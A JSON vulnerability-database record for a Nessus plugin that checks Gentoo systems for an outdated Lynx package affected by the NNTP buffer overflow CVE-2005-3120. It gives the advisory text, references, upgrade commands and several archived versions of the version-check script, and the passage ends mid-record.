{"id": "GENTOO_GLSA-200510-15.NASL", "bulletinFamily": "scanner", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "description": "The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.", "published": "2005-10-19T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/20035", "reporter": "This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/200510-15"], "cvelist": ["CVE-2005-3120"], "type": "nessus", "lastseen": "2019-12-13T07:33:17", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15 (Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters.\n Impact :\n\n An attacker could setup a malicious NNTP server and entice a user to access it using Lynx (either by creating NNTP links on a web page or by forcing a redirect for Lynx users). The data returned by the NNTP server would trigger the buffer overflow and execute arbitrary code with the rights of the user running Lynx.\n Workaround :\n\n There is no known workaround at this time.", "edition": 1, "enchantments": {}, "hash": "23657a581fe81c33ff322bf7c357a2a0316c156c4772a0f6c26d884a46440046", "hashmap": [{"hash": "cc89a7b7faee73f5e1d4fdab043ad839", "key": "sourceData"}, {"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a180ab1fd989ae8dd3f59ee395472d66", "key": "href"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "326af443ca0c41e91daa171ff124ce60", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e5f59ca76842056a7b62321eb5540349", "key": "description"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2016-09-26T17:24:59", "modified": "2015-04-13T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.2", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2015/04/13 13:49:33 $\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_osvdb_id(18914, 20019);\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:59"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15 (Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters.\n Impact :\n\n An attacker could setup a malicious NNTP server and entice a user to access it using Lynx (either by creating NNTP links on a web page or by forcing a redirect for Lynx users). The data returned by the NNTP server would trigger the buffer overflow and execute arbitrary code with the rights of the user running Lynx.\n Workaround :\n\n There is no known workaround at this time.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6b00044d514d9820bc0df87ffb443f5ad0411b9f5c5c1735cbc4d4de41bd0641", "hashmap": [{"hash": "668299569e0b62d5e14770fe8999084b", "key": "sourceData"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a180ab1fd989ae8dd3f59ee395472d66", "key": "href"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "f429a669c6d1aa0a5d15de3e2ff62660", "key": "cpe"}, {"hash": "e5f59ca76842056a7b62321eb5540349", "key": "description"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2018-09-01T23:50:52", "modified": "2018-08-10T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-09-01T23:50:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-10-28T20:23:50", "references": [{"idList": ["SECURITYVULNS:DOC:9961"], "type": "securityvulns"}, {"idList": ["GLSA-200510-15"], "type": "gentoo"}, {"idList": ["DEBIAN:DSA-874-1:A85D0", "DEBIAN:DSA-1085-1:3AB5E", "DEBIAN:DSA-876-1:39741"], "type": "debian"}, {"idList": ["CESA-2005:803", "CESA-2005:803-01"], "type": "centos"}, {"idList": ["OSVDB:20019"], "type": "osvdb"}, {"idList": ["USN-206-1"], "type": "ubuntu"}, {"idList": ["RHSA-2005:803"], "type": "redhat"}, {"idList": ["CVE-2005-3120"], "type": "cve"}, {"idList": ["EDB-ID:1256"], "type": "exploitdb"}, {"idList": ["SSA-2005-310-03"], "type": "slackware"}, {"idList": ["FEDORA_2005-994.NASL", "MANDRAKE_MDKSA-2005-186.NASL", "REDHAT-RHSA-2005-803.NASL", "UBUNTU_USN-206-1.NASL", "FREEBSD_PKG_C01170BF499011DAA1B8000854D03344.NASL", "DEBIAN_DSA-876.NASL", "CENTOS_RHSA-2005-803.NASL", "FEDORA_2005-993.NASL", "DEBIAN_DSA-874.NASL", "SLACKWARE_SSA_2005-310-03.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:55752", "OPENVAS:55743", "OPENVAS:55806", "OPENVAS:56855", "OPENVAS:136141256231055806", "OPENVAS:55658", "OPENVAS:55750"], "type": "openvas"}, {"idList": ["C01170BF-4990-11DA-A1B8-000854D03344"], "type": "freebsd"}]}, "score": {"modified": "2019-10-28T20:23:50", "value": 7.0, "vector": "NONE"}}, "hash": "d9e354cc9d2038bebaa2476908469051449f4f9482678ca44cbb819286c5e561", "hashmap": [{"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "8e15c6b081241240f6a69d63bdc75473", "key": "description"}, {"hash": "2ec58e3149bbfdca87c6474a76a01482", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "f429a669c6d1aa0a5d15de3e2ff62660", "key": "cpe"}, {"hash": "f5bbe8a2cc6600991512b750e4790ba4", "key": "sourceData"}, {"hash": "507c1dcbb71af7a074b2f9898d9bcebb", "key": "reporter"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2019-10-28T20:23:50", "modified": "2019-10-02T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:42\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 1}, "differentElements": ["modified"], "edition": 8, "lastseen": "2019-10-28T20:23:50"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15 (Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and retrieves information about the available articles in the target newsgroup. Ulf Harnhammar discovered a buffer overflow in a function that handles the escaping of special characters.\n Impact :\n\n An attacker could setup a malicious NNTP server and entice a user to access it using Lynx (either by creating NNTP links on a web page or by forcing a redirect for Lynx users). The data returned by the NNTP server would trigger the buffer overflow and execute arbitrary code with the rights of the user running Lynx.\n Workaround :\n\n There is no known workaround at this time.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6b00044d514d9820bc0df87ffb443f5ad0411b9f5c5c1735cbc4d4de41bd0641", "hashmap": [{"hash": "668299569e0b62d5e14770fe8999084b", "key": "sourceData"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "2fe4b13d9f35cdcf8083d1525b42c81c", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a180ab1fd989ae8dd3f59ee395472d66", "key": "href"}, {"hash": "725c91aa283ab77092d2e53606ccb0f8", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "961c51238ce339633b9f217e84eeb79e", "key": "references"}, {"hash": "ca4f114e818b5dc0a40189d888cb0bec", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "f429a669c6d1aa0a5d15de3e2ff62660", "key": "cpe"}, {"hash": "e5f59ca76842056a7b62321eb5540349", "key": "description"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "eab4d37c93551297e871c7fde674c1d5", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20035", "id": "GENTOO_GLSA-200510-15.NASL", "lastseen": "2018-08-11T09:16:15", "modified": "2018-08-10T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20035", "published": "2005-10-19T00:00:00", "references": ["https://security.gentoo.org/glsa/200510-15"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200510-15.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20035);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3120\");\n script_xref(name:\"GLSA\", value:\"200510-15\");\n\n script_name(english:\"GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200510-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Lynx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/lynx-2.8.5-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lynx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/lynx\", unaffected:make_list(\"ge 2.8.5-r1\"), vulnerable:make_list(\"lt 2.8.5-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Lynx\");\n}\n", "title": "GLSA-200510-15 : Lynx: Buffer overflow in NNTP processing", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-11T09:16:15"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:gentoo:linux:lynx", "cpe:/o:gentoo:linux"], "cvelist": ["CVE-2005-3120"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "The remote host is affected by the vulnerability described in GLSA-200510-15\n(Lynx: Buffer overflow in NNTP processing)\n\n When accessing a NNTP URL, Lynx connects to a NNTP server and\n retrieves information about the available articles in the target\n newsgroup. Ulf Harnhammar discovered a buffer overflow in a function\n that handles the escaping of special characters.\n \nImpact :\n\n An attacker could setup a malicious NNTP server and entice a user\n to access it using Lynx (either by creating NNTP links on a web page or\n by forcing a redirect for Lynx users). The data returned by the NNTP\n server would trigger the buffer overflow and execute arbitrary code\n with the rights of the user running Lynx.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 9, "enchantments": {"dependencies": {"modified": "2019-11-01T02:40:14", "references": [{"idList": ["SECURITYVULNS:DOC:9961"], "type": "securityvulns"}, {"idList": ["GLSA-200510-15"], "type": "gentoo"}, {"idList": ["DEBIAN:DSA-874-1:A85D0", "DEBIAN:DSA-1085-1:3AB5E", "DEBIAN:DSA-876-1:39741"], "type": 